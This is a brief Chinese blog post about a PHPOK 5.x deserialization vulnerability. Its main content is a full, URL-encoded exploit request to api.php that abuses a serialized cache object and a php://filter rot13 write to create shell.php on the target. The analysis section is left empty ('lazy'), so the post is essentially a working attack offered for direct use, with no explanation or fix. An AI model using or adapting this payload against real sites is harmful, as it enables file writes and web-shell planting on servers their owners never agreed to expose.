phpok5.x 反序列化漏洞

  1. 漏洞复现
  2. 漏洞分析

最近一直想审个命令执行的漏洞,奈何太过于菜没思路,就一直在找分析的文章,吃完饭看见freebuf上发了一篇代码审计的文章,赶紧拉过来看看。

漏洞复现

https://download.phpok.com/5.3.zip
EXP:

1
http://127.0.0.1/phpok5.3/api.php?c=call&f=index&data=%7B%22m_picplayer%22%3A%7B%22site%22%3A1%2C%22type_id%22%3A%22format_ext_all%22%2C%220%22%3A%7B%22form_type%22%3A%22url%22%2C%22content%22%3A%22O%3A5%3A%5C%22cache%5C%22%3A4%3A%7Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000folder%5C%22%3Bs%3A41%3A%5C%22php%3A%5C%2F%5C%2Ffilter%5C%2Fwrite%3Dstring.rot13%5C%2Fresource%3D%5C%22%3Bs%3A11%3A%5C%22%5Cu0000%2A%5Cu0000key_list%5C%22%3Bs%3A19%3A%5C%22%3C%3Fcuc+cucvasb%28%29%3B+%3F%3E%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000key_id%5C%22%3Bs%3A5%3A%5C%22shell%5C%22%3Bs%3A9%3A%5C%22%5Cu0000%2A%5Cu0000status%5C%22%3Bb%3A1%3B%7D%22%7D%7D%7D

https://download.phpok.com/5.4.zip

可以直接打,真爽,打完之后会在根目录下生成一个shell.php

漏洞分析

lazy…….


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:phpok5.x 反序列化漏洞

本文作者:sher10ck

发布时间:2019-12-11, 18:32:30

最后更新:2020-01-13, 13:02:48

原始链接:http://sherlocz.github.io/2019/12/11/phpok5-x-反序列化漏洞/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录